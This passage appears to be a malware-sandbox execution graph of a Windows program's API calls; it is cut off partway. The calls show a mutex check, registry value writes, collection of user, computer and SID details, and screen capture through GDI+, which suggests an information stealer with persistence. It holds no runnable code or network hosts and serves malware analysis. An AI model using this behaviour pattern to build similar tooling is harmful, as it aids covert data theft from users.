                                                                                                        Signature Coverage:41.9%
                                                                                                        Total number of Nodes:1517
                                                                                                        Total number of Limit Nodes:16
                                                                                                        execution_graph 28946 789b4b 28947 789b54 28946->28947 28954 78a37f IsProcessorFeaturePresent 28947->28954 28949 789b60 28955 78c469 10 API calls 2 library calls 28949->28955 28951 789b65 28952 789b69 28951->28952 28956 78c488 7 API calls 2 library calls 28951->28956 28954->28949 28955->28951 28956->28952 28957 799ffd 28958 79a1a0 28957->28958 28960 79a027 28957->28960 29008 790c72 14 API calls __dosmaperr 28958->29008 28960->28958 28963 79a072 28960->28963 28962 79a1bd 28978 79e952 28963->28978 28967 79a0a6 28968 79a1bf 28967->28968 28993 79e037 28967->28993 29016 78ea55 IsProcessorFeaturePresent 28968->29016 28971 79a1cb 28972 79a0b8 28972->28968 29000 79e063 28972->29000 28974 79a0ca 28974->28968 28975 79a0d3 28974->28975 28976 79a18b 28975->28976 29007 79e9af 25 API calls 2 library calls 28975->29007 29009 7896b0 28976->29009 28979 79e95e __FrameHandler3::FrameUnwindToState 28978->28979 28980 79a092 28979->28980 29020 792100 EnterCriticalSection 28979->29020 28986 79e00b 28980->28986 28982 79e96f 28983 79e983 28982->28983 29021 79e82b 28982->29021 29041 79e9a6 LeaveCriticalSection std::_Lockit::~_Lockit 28983->29041 28987 79e02c 28986->28987 28988 79e017 28986->28988 28987->28967 29163 790c72 14 API calls __dosmaperr 28988->29163 28990 79e01c 29164 78ea28 25 API calls __wsopen_s 28990->29164 28992 79e027 28992->28967 28994 79e058 28993->28994 28995 79e043 28993->28995 28994->28972 29165 790c72 14 API calls __dosmaperr 28995->29165 28997 79e048 29166 78ea28 25 API calls __wsopen_s 28997->29166 28999 79e053 28999->28972 29001 79e06f 29000->29001 29002 79e084 29000->29002 29167 790c72 14 API calls __dosmaperr 29001->29167 29002->28974 29004 79e074 29168 78ea28 25 API calls __wsopen_s 29004->29168 29006 79e07f 29006->28974 29007->28976 29008->28976 29010 7896b8 29009->29010 29011 7896b9 IsProcessorFeaturePresent 29009->29011 29010->28962 29013 7898e5 29011->29013 29169 7898a8 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 29013->29169 29015 7899c8 29015->28962 29017 78ea61 29016->29017 29170 78e87c 29017->29170 29020->28982 29022 79e877 29021->29022 29023 79e87e 29022->29023 29024 79e88f 29022->29024 29026 79e8f5 29023->29026 29029 79e8ec 29023->29029 29143 797e35 15 API calls 3 library calls 29024->29143 29027 79e8f2 29026->29027 29104 79e6d1 29026->29104 29030 797c06 _free 14 API calls 29027->29030 29042 79e430 29029->29042 29033 79e900 29030->29033 29032 79e89d 29034 79e8a4 29032->29034 29038 79e8cc 29032->29038 29035 7896b0 _ValidateLocalCookies 5 API calls 29033->29035 29144 797c06 29034->29144 29039 79e90e 29035->29039 29037 79e8aa 29037->29023 29040 797c06 _free 14 API calls 29038->29040 29039->28983 29040->29037 29041->28980 29043 79e440 29042->29043 29044 79e063 25 API calls 29043->29044 29045 79e45f 29044->29045 29046 79e6c6 29045->29046 29047 79e00b 25 API calls 29045->29047 29048 78ea55 __Getctype 11 API calls 29046->29048 29049 79e471 29047->29049 29050 79e6d0 29048->29050 29049->29046 29051 79e4cb 29049->29051 29054 79e6bf 29049->29054 29055 79e063 25 API calls 29050->29055 29150 797e35 15 API calls 3 library calls 29051->29150 29053 79e4dc 29058 797c06 _free 14 API calls 29053->29058 29101 79e6a1 29053->29101 29054->29027 29056 79e6fe 29055->29056 29057 79e820 29056->29057 29060 79e00b 25 API calls 29056->29060 29062 78ea55 __Getctype 11 API calls 29057->29062 29061 79e4f2 29058->29061 29059 797c06 _free 14 API calls 29063 79e6be 29059->29063 29064 79e710 29060->29064 29151 79c0f3 25 API calls 2 library calls 29061->29151 29069 79e82a 29062->29069 29063->29054 29064->29057 29065 79e037 25 API calls 29064->29065 29067 79e722 29065->29067 29067->29057 29070 79e72b 29067->29070 29068 79e520 29071 79e6c4 29068->29071 29087 79e52b __fread_nolock 29068->29087 29072 79e87e 29069->29072 29074 79e88f 29069->29074 29073 797c06 _free 14 API calls 29070->29073 29071->29046 29077 79e8f5 29072->29077 29080 79e8ec 29072->29080 29075 79e736 GetTimeZoneInformation 29073->29075 29157 797e35 15 API calls 3 library calls 29074->29157 29094 79e7fa 29075->29094 29095 79e752 __fread_nolock 29075->29095 29078 79e8f2 29077->29078 29079 79e6d1 41 API calls 29077->29079 29081 797c06 _free 14 API calls 29078->29081 29079->29078 29083 79e430 41 API calls 29080->29083 29084 79e900 29081->29084 29082 79e8a4 29088 797c06 _free 14 API calls 29082->29088 29083->29078 29086 7896b0 _ValidateLocalCookies 5 API calls 29084->29086 29085 79e89d 29085->29082 29090 79e8cc 29085->29090 29091 79e90e 29086->29091 29152 79e3e9 42 API calls 6 library calls 29087->29152 29089 79e8aa 29088->29089 29089->29072 29092 797c06 _free 14 API calls 29090->29092 29091->29027 29092->29089 29094->29027 29154 792427 37 API calls __Getctype 29095->29154 29097 79e7d5 29155 79e910 42 API calls 4 library calls 29097->29155 29099 79e7e6 29156 79e910 42 API calls 4 library calls 29099->29156 29101->29059 29103 79e576 29103->29101 29153 79e3e9 42 API calls 6 library calls 29103->29153 29105 79e6e1 29104->29105 29106 79e063 25 API calls 29105->29106 29107 79e6fe 29106->29107 29108 79e820 29107->29108 29109 79e00b 25 API calls 29107->29109 29110 78ea55 __Getctype 11 API calls 29108->29110 29111 79e710 29109->29111 29114 79e82a 29110->29114 29111->29108 29112 79e037 25 API calls 29111->29112 29113 79e722 29112->29113 29113->29108 29115 79e72b 29113->29115 29116 79e87e 29114->29116 29118 79e88f 29114->29118 29117 797c06 _free 14 API calls 29115->29117 29121 79e8f5 29116->29121 29124 79e8ec 29116->29124 29119 79e736 GetTimeZoneInformation 29117->29119 29161 797e35 15 API calls 3 library calls 29118->29161 29135 79e7fa 29119->29135 29137 79e752 __fread_nolock 29119->29137 29122 79e8f2 29121->29122 29123 79e6d1 41 API calls 29121->29123 29125 797c06 _free 14 API calls 29122->29125 29123->29122 29127 79e430 41 API calls 29124->29127 29128 79e900 29125->29128 29126 79e8a4 29131 797c06 _free 14 API calls 29126->29131 29127->29122 29130 7896b0 _ValidateLocalCookies 5 API calls 29128->29130 29129 79e89d 29129->29126 29133 79e8cc 29129->29133 29134 79e90e 29130->29134 29132 79e8aa 29131->29132 29132->29116 29136 797c06 _free 14 API calls 29133->29136 29134->29027 29135->29027 29136->29132 29158 792427 37 API calls __Getctype 29137->29158 29139 79e7d5 29159 79e910 42 API calls 4 library calls 29139->29159 29141 79e7e6 29160 79e910 42 API calls 4 library calls 29141->29160 29143->29032 29145 797c11 HeapFree 29144->29145 29149 797c3a _free 29144->29149 29146 797c26 29145->29146 29145->29149 29162 790c72 14 API calls __dosmaperr 29146->29162 29148 797c2c GetLastError 29148->29149 29149->29037 29150->29053 29151->29068 29152->29103 29153->29101 29154->29097 29155->29099 29156->29094 29157->29085 29158->29139 29159->29141 29160->29135 29161->29129 29162->29148 29163->28990 29164->28992 29165->28997 29166->28999 29167->29004 29168->29006 29169->29015 29171 78e898 __fread_nolock IsInExceptionSpec 29170->29171 29172 78e8c4 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 29171->29172 29173 78e995 IsInExceptionSpec 29172->29173 29174 7896b0 _ValidateLocalCookies 5 API calls 29173->29174 29175 78e9b3 GetCurrentProcess TerminateProcess 29174->29175 29175->28971 29176 7962ec GetStartupInfoW 29177 796309 29176->29177 29178 79639d 29176->29178 29177->29178 29182 799c3f 29177->29182 29180 796331 29180->29178 29181 796361 GetFileType 29180->29181 29181->29180 29183 799c4b __FrameHandler3::FrameUnwindToState 29182->29183 29184 799c75 29183->29184 29185 799c54 29183->29185 29195 792100 EnterCriticalSection 29184->29195 29203 790c72 14 API calls __dosmaperr 29185->29203 29188 799c59 29204 78ea28 25 API calls __wsopen_s 29188->29204 29190 799c63 29190->29180 29191 799cad 29205 799cd4 LeaveCriticalSection std::_Lockit::~_Lockit 29191->29205 29194 799c81 29194->29191 29196 799b8f 29194->29196 29195->29194 29206 79a21a 29196->29206 29198 799bae 29200 797c06 _free 14 API calls 29198->29200 29199 799ba1 29199->29198 29213 7984a9 6 API calls std::_Locinfo::_Locinfo_ctor 29199->29213 29202 799c03 29200->29202 29202->29194 29203->29188 29204->29190 29205->29190 29211 79a227 __dosmaperr 29206->29211 29207 79a267 29215 790c72 14 API calls __dosmaperr 29207->29215 29208 79a252 RtlAllocateHeap 29210 79a265 29208->29210 29208->29211 29210->29199 29211->29207 29211->29208 29214 7933e3 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 29211->29214 29213->29199 29214->29211 29215->29210 29216 780aa0 29227 76c6d0 Sleep CreateMutexA GetLastError 29216->29227 29218 780aab 29276 7713c0 29218->29276 29224 780abf 29225 780a50 CreateThread CreateThread CreateThread 29224->29225 29226 780a90 Sleep 29225->29226 30185 7808a0 29225->30185 30191 780930 29225->30191 30197 7809c0 29225->30197 29226->29226 29228 76c706 29227->29228 29229 76c717 29227->29229 29228->29229 29230 76c70a GetLastError 29228->29230 29229->29218 29230->29229 29231 76c719 29230->29231 29516 78dc4e 23 API calls IsInExceptionSpec 29231->29516 29233 76c720 29517 76aca0 115 API calls 2 library calls 29233->29517 29235 76c765 29518 76a940 115 API calls 2 library calls 29235->29518 29237 76c774 SetCurrentDirectoryA 29239 76c78b 29237->29239 29240 76c7ad _Ref_count_obj 29237->29240 29239->29240 29242 76cae4 29239->29242 29519 783030 29240->29519 29721 78ea38 29242->29721 29243 76c7cc 29535 7661f0 29243->29535 29246 76cae9 29248 78ea38 25 API calls 29246->29248 29247 76c7d7 29249 783030 70 API calls 29247->29249 29251 76caee 29248->29251 29250 76c7f3 29249->29250 29252 7661f0 114 API calls 29250->29252 29253 78ea38 25 API calls 29251->29253 29254 76c7fe 29252->29254 29255 76caf3 29253->29255 29256 783030 70 API calls 29254->29256 29257 76c81a 29256->29257 29258 7661f0 114 API calls 29257->29258 29259 76c825 29258->29259 29698 7845e0 29259->29698 29261 76c839 29702 785430 29261->29702 29263 76c84d 29264 7845e0 27 API calls 29263->29264 29265 76c85c 29264->29265 29719 782eb0 27 API calls _Yarn 29265->29719 29267 76c86f 29268 785430 27 API calls 29267->29268 29269 76c8a5 29268->29269 29720 768e10 115 API calls _Ref_count_obj 29269->29720 29271 76ca8f _Ref_count_obj 29271->29251 29273 76cabf _Ref_count_obj 29271->29273 29272 76c8aa _Ref_count_obj 29272->29246 29272->29271 29274 7896b0 _ValidateLocalCookies 5 API calls 29273->29274 29275 76cae0 29274->29275 29275->29218 29277 771410 29276->29277 29278 77142a 29276->29278 29280 783030 70 API calls 29277->29280 29279 7896b0 _ValidateLocalCookies 5 API calls 29278->29279 29281 771ae5 29279->29281 29282 77141f 29280->29282 29284 771c50 29281->29284 29283 7661f0 114 API calls 29282->29283 29283->29278 29285 771c8b 29284->29285 29286 77205a 29284->29286 29289 783030 70 API calls 29285->29289 29287 7896b0 _ValidateLocalCookies 5 API calls 29286->29287 29288 772072 29287->29288 29346 77f060 29288->29346 29290 771cd5 29289->29290 29291 7661f0 114 API calls 29290->29291 29292 771ce0 29291->29292 29293 772076 29292->29293 29294 771cff 29292->29294 29844 7626a0 27 API calls 29293->29844 29831 785610 27 API calls 3 library calls 29294->29831 29297 77207b 29299 78ea38 25 API calls 29297->29299 29298 771d2e 29300 785430 27 API calls 29298->29300 29301 772080 29299->29301 29302 771d4b 29300->29302 29845 78e4b9 67 API calls 4 library calls 29301->29845 29832 782f70 29302->29832 29305 772086 29846 782ff0 27 API calls 29305->29846 29307 77209b 29309 783030 70 API calls 29307->29309 29308 771e13 GetModuleFileNameA 29311 771e50 29308->29311 29312 7720b6 29309->29312 29310 771e09 _Ref_count_obj 29310->29308 29311->29311 29314 783f40 27 API calls 29311->29314 29847 782ff0 27 API calls 29312->29847 29313 771d5d _Ref_count_obj 29313->29297 29313->29308 29313->29310 29320 771e6c _Ref_count_obj 29314->29320 29316 7720c9 29848 78dc4e 23 API calls IsInExceptionSpec 29316->29848 29317 771f04 29837 78ded0 28 API calls 29317->29837 29319 7720dc 29322 78ea38 25 API calls 29319->29322 29320->29317 29320->29319 29323 771fd5 _Ref_count_obj 29320->29323 29325 7720e1 29322->29325 29323->29286 29323->29319 29326 772050 _Ref_count_obj 29323->29326 29324 771f1b 29324->29301 29327 771f26 29324->29327 29326->29286 29838 769ed0 GetFileAttributesA 29327->29838 29329 771f31 29330 771f49 29329->29330 29332 771f42 CreateDirectoryA 29329->29332 29839 769ed0 GetFileAttributesA 29330->29839 29332->29330 29333 771f54 29334 771f86 29333->29334 29335 783030 70 API calls 29333->29335 29842 769ea0 68 API calls 29334->29842 29337 771f6f 29335->29337 29840 76a8c0 28 API calls _ValidateLocalCookies 29337->29840 29338 771f94 29338->29316 29843 782ff0 27 API calls 29338->29843 29340 771f7d 29841 770e40 28 API calls 2 library calls 29340->29841 29343 771fb1 29344 783030 70 API calls 29343->29344 29345 771fcc 29344->29345 29345->29312 29347 77f098 29346->29347 29849 7678e0 29347->29849 29350 782f70 25 API calls 29351 77f0b6 29350->29351 29352 77f0e6 _Ref_count_obj 29351->29352 29355 78087a 29351->29355 29865 7693d0 29352->29865 29357 78ea38 25 API calls 29355->29357 29359 780893 29357->29359 29362 7643e0 27 API calls 29363 77f11b RegOpenKeyExA RegCloseKey 29362->29363 29364 7643e0 27 API calls 29363->29364 29365 77f16b 29364->29365 29366 783030 70 API calls 29365->29366 29367 77f189 29366->29367 29368 7661f0 114 API calls 29367->29368 29369 77f190 29368->29369 29370 783030 70 API calls 29369->29370 29371 77f1a5 29370->29371 29372 7661f0 114 API calls 29371->29372 29373 77f1ac 29372->29373 29374 77f1c3 GetUserNameA 29373->29374 29375 77f216 29374->29375 29375->29375 29376 783f40 27 API calls 29375->29376 29377 77f232 29376->29377 29989 76b250 GetComputerNameExW 29377->29989 29382 77f293 29382->29382 29383 783f40 27 API calls 29382->29383 29384 77f2ab 29383->29384 30129 769e20 29384->30129 29387 7643e0 27 API calls 29388 77f2cd 29387->29388 29389 783030 70 API calls 29388->29389 29390 77f2e7 29389->29390 29391 7661f0 114 API calls 29390->29391 29392 77f2f2 29391->29392 29393 7643e0 27 API calls 29392->29393 29394 77f309 29393->29394 29395 783030 70 API calls 29394->29395 29396 77f31f 29395->29396 29397 7661f0 114 API calls 29396->29397 29398 77f32a 29397->29398 29399 783030 70 API calls 29398->29399 29400 77f34d 29399->29400 29401 7661f0 114 API calls 29400->29401 29402 77f358 29401->29402 29403 783030 70 API calls 29402->29403 29404 77f37b 29403->29404 29405 7661f0 114 API calls 29404->29405 29406 77f386 29405->29406 29407 783030 70 API calls 29406->29407 29408 77f3a9 29407->29408 29409 7661f0 114 API calls 29408->29409 29410 77f3b4 29409->29410 29411 783030 70 API calls 29410->29411 29412 77f3d7 29411->29412 29413 7661f0 114 API calls 29412->29413 29414 77f3e2 29413->29414 29415 783030 70 API calls 29414->29415 29416 77f405 29415->29416 29417 7661f0 114 API calls 29416->29417 29418 77f410 29417->29418 29419 783030 70 API calls 29418->29419 29420 77f433 29419->29420 29421 7661f0 114 API calls 29420->29421 29422 77f43e 29421->29422 29423 783030 70 API calls 29422->29423 29424 77f461 29423->29424 29425 7661f0 114 API calls 29424->29425 29426 77f46c 29425->29426 29427 783030 70 API calls 29426->29427 29428 77f48d 29427->29428 29429 7661f0 114 API calls 29428->29429 29430 77f498 29429->29430 29431 783030 70 API calls 29430->29431 29432 77f4aa 29431->29432 29433 7661f0 114 API calls 29432->29433 29434 77f4b5 29433->29434 29435 783030 70 API calls 29434->29435 29436 77f4c7 29435->29436 29437 7661f0 114 API calls 29436->29437 29438 77f4d2 29437->29438 29439 783030 70 API calls 29438->29439 29440 77f4ef 29439->29440 29441 7661f0 114 API calls 29440->29441 29442 77f4fa 29441->29442 29443 7845e0 27 API calls 29442->29443 29444 77f50e 29443->29444 29445 785430 27 API calls 29444->29445 29446 77f528 29445->29446 29447 785430 27 API calls 29446->29447 29448 77f545 29447->29448 29449 785430 27 API calls 29448->29449 29450 77f562 29449->29450 29451 7845e0 27 API calls 29450->29451 29452 77f577 29451->29452 29453 785430 27 API calls 29452->29453 29454 77f596 29453->29454 29455 7845e0 27 API calls 29454->29455 29456 77f5ab 29455->29456 29457 785430 27 API calls 29456->29457 29458 77f5ca 29457->29458 29459 7845e0 27 API calls 29458->29459 29460 77f5df 29459->29460 29461 785430 27 API calls 29460->29461 29462 77f5fe 29461->29462 29463 7845e0 27 API calls 29462->29463 29464 77f613 29463->29464 29465 785430 27 API calls 29464->29465 29466 77f632 29465->29466 29467 7845e0 27 API calls 29466->29467 29468 77f647 29467->29468 29469 785430 27 API calls 29468->29469 29470 77f666 29469->29470 29471 7845e0 27 API calls 29470->29471 29472 77f67b 29471->29472 29473 785430 27 API calls 29472->29473 29474 77f69a 29473->29474 29475 7845e0 27 API calls 29474->29475 29476 77f6af 29475->29476 29477 785430 27 API calls 29476->29477 29478 77f6ce 29477->29478 29479 7845e0 27 API calls 29478->29479 29480 77f6e3 29479->29480 29481 785430 27 API calls 29480->29481 29482 77f702 29481->29482 29483 785430 27 API calls 29482->29483 29484 77f724 29483->29484 29485 785430 27 API calls 29484->29485 29486 77f746 29485->29486 29487 7845e0 27 API calls 29486->29487 29492 77f75b _Ref_count_obj 29487->29492 29488 780458 29491 783030 70 API calls 29488->29491 29489 780383 29490 783030 70 API calls 29489->29490 29493 780399 29490->29493 29494 78046d 29491->29494 29492->29488 29492->29489 29495 7661f0 114 API calls 29493->29495 29496 783030 70 API calls 29494->29496 29497 7803a4 29495->29497 29498 780482 29496->29498 29499 7845e0 27 API calls 29497->29499 30137 764d60 27 API calls _Ref_count_obj 29498->30137 29501 7803b8 29499->29501 29503 782f70 25 API calls 29501->29503 29502 780491 30138 76cb00 27 API calls 29502->30138 29514 7803c6 _Ref_count_obj 29503->29514 29505 7804a2 29506 783030 70 API calls 29505->29506 29507 7804b7 29506->29507 29508 7661f0 114 API calls 29507->29508 29509 7804c2 29508->29509 29510 785430 27 API calls 29509->29510 29511 7804dc 29510->29511 29512 782f70 25 API calls 29511->29512 29512->29514 29513 7896b0 _ValidateLocalCookies 5 API calls 29515 780876 29513->29515 29514->29513 29515->29224 29516->29233 29517->29235 29518->29237 29520 78305b 29519->29520 29521 783062 29520->29521 29522 7830b4 29520->29522 29523 783095 29520->29523 29521->29243 29530 7830a9 _Yarn 29522->29530 29727 7625c0 27 API calls 4 library calls 29522->29727 29524 7830ea 29523->29524 29525 78309c 29523->29525 29728 7625c0 27 API calls 2 library calls 29524->29728 29726 7625c0 27 API calls 4 library calls 29525->29726 29529 7830a2 29529->29530 29531 78ea38 25 API calls 29529->29531 29530->29243 29532 7830f4 29531->29532 29729 76ddc0 68 API calls std::ios_base::_Ios_base_dtor 29532->29729 29534 78310e _Ref_count_obj 29534->29243 29730 765da0 29535->29730 29541 76630f 29544 78ea38 25 API calls 29541->29544 29542 7662e9 _Ref_count_obj 29543 7896b0 _ValidateLocalCookies 5 API calls 29542->29543 29546 76630b 29543->29546 29547 766314 __fread_nolock 29544->29547 29545 76625f _Ref_count_obj 29545->29541 29545->29542 29546->29247 29548 766377 RegOpenKeyExA 29547->29548 29549 7663a6 RegQueryValueExA 29548->29549 29550 7663d0 RegCloseKey 29548->29550 29549->29550 29551 766400 29550->29551 29551->29551 29745 783f40 29551->29745 29553 766480 _Ref_count_obj 29556 7896b0 _ValidateLocalCookies 5 API calls 29553->29556 29554 7664a7 29558 78ea38 25 API calls 29554->29558 29555 766418 _Ref_count_obj 29555->29553 29555->29554 29557 7664a3 29556->29557 29557->29247 29559 7664ac RegOpenKeyExA 29558->29559 29560 766517 RegCloseKey 29559->29560 29561 7664ed RegSetValueExA 29559->29561 29562 766528 _Ref_count_obj 29560->29562 29561->29560 29563 7665e6 29562->29563 29564 7665ce _Ref_count_obj 29562->29564 29566 78ea38 25 API calls 29563->29566 29565 7896b0 _ValidateLocalCookies 5 API calls 29564->29565 29567 7665e2 29565->29567 29568 7665eb 29566->29568 29567->29247 29760 7915a7 29568->29760 29571 766646 RegSetValueExA 29572 766665 RegCloseKey 29571->29572 29574 766676 _Ref_count_obj 29572->29574 29573 766734 29577 78ea38 25 API calls 29573->29577 29574->29573 29575 76671c _Ref_count_obj 29574->29575 29576 7896b0 _ValidateLocalCookies 5 API calls 29575->29576 29578 766730 29576->29578 29579 766739 __wsopen_s 29577->29579 29578->29247 29580 783030 70 API calls 29579->29580 29581 7667a0 29580->29581 29582 7661f0 74 API calls 29581->29582 29583 7667ab RegOpenKeyExA 29582->29583 29586 7667d9 __fread_nolock _Ref_count_obj 29583->29586 29585 766d64 29588 7896b0 _ValidateLocalCookies 5 API calls 29585->29588 29586->29585 29587 766d80 29586->29587 29589 766829 RegQueryInfoKeyW 29586->29589 29591 78ea38 25 API calls 29587->29591 29590 766d7c 29588->29590 29592 766d58 RegCloseKey 29589->29592 29622 7668a8 _Ref_count_obj 29589->29622 29590->29247 29593 766d85 GdiplusStartup 29591->29593 29592->29585 29595 766e39 29593->29595 29599 766e13 GetDC 29593->29599 29594 7668b2 RegEnumValueA 29594->29622 29596 767534 29595->29596 29597 766e45 29595->29597 29767 7626a0 27 API calls 29596->29767 29764 7853d0 27 API calls std::_Facet_Register 29597->29764 29605 783030 70 API calls 29599->29605 29600 767539 29603 78ea38 25 API calls 29600->29603 29602 783f40 27 API calls 29602->29622 29606 767552 GetUserNameA LookupAccountNameA GetSidIdentifierAuthority 29603->29606 29607 766f8b 29605->29607 29609 783030 70 API calls 29606->29609 29610 7661f0 74 API calls 29607->29610 29611 767626 29609->29611 29612 766f96 29610->29612 29613 7661f0 74 API calls 29611->29613 29614 783030 70 API calls 29612->29614 29615 767631 29613->29615 29616 766fb3 29614->29616 29768 762400 44 API calls 29615->29768 29617 7661f0 74 API calls 29616->29617 29619 766fba 29617->29619 29620 783030 70 API calls 29619->29620 29621 766fcf 29620->29621 29623 7661f0 74 API calls 29621->29623 29622->29587 29622->29592 29622->29594 29622->29602 29659 7661f0 74 API calls 29622->29659 29671 783030 70 API calls 29622->29671 29626 766fd6 29623->29626 29624 7678c3 29628 78ea38 25 API calls 29624->29628 29625 767649 _Ref_count_obj 29625->29624 29627 783030 70 API calls 29625->29627 29631 783030 70 API calls 29626->29631 29630 7676b2 29627->29630 29629 7678c8 29628->29629 29632 78ea38 25 API calls 29629->29632 29633 7661f0 74 API calls 29630->29633 29634 767002 29631->29634 29635 7678cd 29632->29635 29638 7676bd 29633->29638 29636 7661f0 74 API calls 29634->29636 29637 78ea38 25 API calls 29635->29637 29639 76700d 29636->29639 29640 7678d2 29637->29640 29769 762400 44 API calls 29638->29769 29642 785430 27 API calls 29639->29642 29643 767024 29642->29643 29645 785430 27 API calls 29643->29645 29644 76771a GetSidSubAuthorityCount 29646 7677d2 29644->29646 29668 767734 _Ref_count_obj 29644->29668 29653 76703b _Ref_count_obj 29645->29653 29650 783f40 27 API calls 29646->29650 29647 7676d7 _Ref_count_obj 29647->29629 29647->29644 29648 767740 GetSidSubAuthority 29649 783030 70 API calls 29648->29649 29649->29668 29652 767822 29650->29652 29651 7661f0 74 API calls 29651->29668 29655 783f40 27 API calls 29652->29655 29653->29600 29654 76715f _Ref_count_obj 29653->29654 29656 783030 70 API calls 29654->29656 29657 76786f 29655->29657 29660 76719f 29656->29660 29657->29635 29661 76789b _Ref_count_obj 29657->29661 29659->29622 29662 7661f0 74 API calls 29660->29662 29663 7896b0 _ValidateLocalCookies 5 API calls 29661->29663 29664 7671aa 29662->29664 29665 7678bf 29663->29665 29666 7671b5 RegGetValueA 29664->29666 29667 7671b3 29664->29667 29665->29247 29675 7671e5 _Ref_count_obj 29666->29675 29667->29666 29668->29624 29668->29646 29668->29648 29668->29651 29770 762400 44 API calls 29668->29770 29669 767226 GetSystemMetrics 29672 767234 29669->29672 29673 76722d 29669->29673 29670 76722f GetSystemMetrics 29670->29672 29671->29622 29674 783030 70 API calls 29672->29674 29673->29670 29676 76724f 29674->29676 29675->29669 29675->29670 29677 7661f0 74 API calls 29676->29677 29678 76725a RegGetValueA 29677->29678 29680 76728f _Ref_count_obj 29678->29680 29681 7672d3 GetSystemMetrics 29680->29681 29682 7672ca GetSystemMetrics 29680->29682 29684 7672d8 6 API calls 29681->29684 29683 7672d1 29682->29683 29682->29684 29683->29681 29685 76736b 29684->29685 29686 7673f8 6 API calls 29684->29686 29765 7920a9 15 API calls 3 library calls 29685->29765 29692 76744f _Ref_count_obj 29686->29692 29688 7674e0 GdiplusShutdown 29695 7674f1 _Ref_count_obj 29688->29695 29689 767371 29689->29686 29690 767380 GdipGetImageEncoders 29689->29690 29697 767394 29690->29697 29691 7896b0 _ValidateLocalCookies 5 API calls 29693 767530 29691->29693 29692->29688 29693->29247 29695->29691 29696 7673ef 29696->29686 29766 791861 14 API calls _free 29697->29766 29699 7845f9 29698->29699 29701 78460d _Yarn 29699->29701 29825 7851b0 27 API calls 3 library calls 29699->29825 29701->29261 29703 785473 29702->29703 29704 785600 29703->29704 29705 785540 29703->29705 29711 785478 _Yarn 29703->29711 29828 7626a0 27 API calls 29704->29828 29708 78559b 29705->29708 29709 785575 29705->29709 29707 785605 29829 7625c0 27 API calls 2 library calls 29707->29829 29718 78558d _Yarn 29708->29718 29827 7625c0 27 API calls 4 library calls 29708->29827 29709->29707 29712 785580 29709->29712 29711->29263 29826 7625c0 27 API calls 4 library calls 29712->29826 29713 785586 29716 78ea38 25 API calls 29713->29716 29713->29718 29717 78560f 29716->29717 29718->29263 29719->29267 29720->29272 29830 78e9c4 25 API calls 3 library calls 29721->29830 29723 78ea47 29724 78ea55 __Getctype 11 API calls 29723->29724 29725 78ea54 29724->29725 29726->29529 29727->29530 29728->29529 29729->29534 29771 783e00 27 API calls 3 library calls 29730->29771 29732 765dd1 29733 766060 29732->29733 29772 783e00 27 API calls 3 library calls 29733->29772 29735 7661c6 29738 7651a0 29735->29738 29737 766095 29737->29735 29773 78fdd0 40 API calls __Getctype 29737->29773 29739 765432 29738->29739 29740 765204 29738->29740 29739->29545 29742 765355 29740->29742 29774 78fdd0 40 API calls __Getctype 29740->29774 29775 784f10 27 API calls 3 library calls 29740->29775 29742->29739 29776 784f10 27 API calls 3 library calls 29742->29776 29748 783f5e _Yarn 29745->29748 29750 783f84 29745->29750 29746 78406e 29779 7626a0 27 API calls 29746->29779 29748->29555 29749 784073 29780 7625c0 27 API calls 2 library calls 29749->29780 29750->29746 29752 783fd8 29750->29752 29753 783ffd 29750->29753 29752->29749 29777 7625c0 27 API calls 4 library calls 29752->29777 29758 783fe9 _Yarn 29753->29758 29778 7625c0 27 API calls 4 library calls 29753->29778 29754 784078 _Ref_count_obj 29754->29555 29757 78ea38 25 API calls 29757->29746 29758->29757 29759 784050 _Ref_count_obj 29758->29759 29759->29555 29761 7915c2 29760->29761 29781 790cd1 29761->29781 29764->29599 29765->29689 29766->29696 29768->29625 29769->29647 29770->29668 29771->29732 29772->29737 29773->29737 29774->29740 29775->29740 29776->29742 29777->29758 29778->29758 29780->29754 29799 78fb57 29781->29799 29783 790d1c 29808 78dee7 29783->29808 29784 790cf8 29806 790c72 14 API calls __dosmaperr 29784->29806 29785 790ce3 29785->29783 29785->29784 29798 76661c RegOpenKeyExA 29785->29798 29788 790cfd 29807 78ea28 25 API calls __wsopen_s 29788->29807 29791 790d28 29792 790d57 29791->29792 29816 791553 40 API calls 2 library calls 29791->29816 29795 790dc1 29792->29795 29817 7914fc 25 API calls 2 library calls 29792->29817 29818 7914fc 25 API calls 2 library calls 29795->29818 29796 790e87 29796->29798 29819 790c72 14 API calls __dosmaperr 29796->29819 29798->29571 29798->29572 29800 78fb5c 29799->29800 29801 78fb6f 29799->29801 29820 790c72 14 API calls __dosmaperr 29800->29820 29801->29785 29803 78fb61 29821 78ea28 25 API calls __wsopen_s 29803->29821 29805 78fb6c 29805->29785 29806->29788 29807->29798 29809 78df07 29808->29809 29810 78defe 29808->29810 29809->29810 29822 796820 37 API calls 3 library calls 29809->29822 29810->29791 29812 78df27 29823 797046 37 API calls __Getctype 29812->29823 29814 78df3d 29824 797073 37 API calls __cftoe 29814->29824 29816->29791 29817->29795 29818->29796 29819->29798 29820->29803 29821->29805 29822->29812 29823->29814 29824->29810 29825->29701 29826->29713 29827->29718 29829->29713 29830->29723 29831->29298 29833 782f7e 29832->29833 29834 782fa1 _Ref_count_obj 29832->29834 29833->29834 29835 78ea38 25 API calls 29833->29835 29834->29313 29836 782fec 29835->29836 29837->29324 29838->29329 29839->29333 29840->29340 29841->29334 29842->29338 29843->29343 29845->29305 29846->29307 29847->29316 29848->29319 29863 767c4a 29849->29863 29864 76795f _Ref_count_obj 29849->29864 29850 767d12 30140 784450 27 API calls 29850->30140 29851 767c73 29852 783f40 27 API calls 29851->29852 29860 767c92 _Ref_count_obj 29852->29860 29854 767d17 29856 78ea38 25 API calls 29854->29856 29855 783f40 27 API calls 29855->29864 29857 767d1c 29856->29857 29858 767ce8 _Ref_count_obj 29859 7896b0 _ValidateLocalCookies 5 API calls 29858->29859 29861 767d0b 29859->29861 29860->29854 29860->29858 29861->29350 29863->29850 29863->29851 29864->29850 29864->29854 29864->29855 29864->29863 30139 785790 27 API calls _Yarn 29864->30139 30141 78b340 29865->30141 29868 769458 29870 783030 70 API calls 29868->29870 29869 7896b0 _ValidateLocalCookies 5 API calls 29871 769a0d 29869->29871 29872 769467 29870->29872 29959 7643e0 29871->29959 29873 7661f0 114 API calls 29872->29873 29874 769472 29873->29874 29875 783030 70 API calls 29874->29875 29876 769494 29875->29876 29877 7661f0 114 API calls 29876->29877 29878 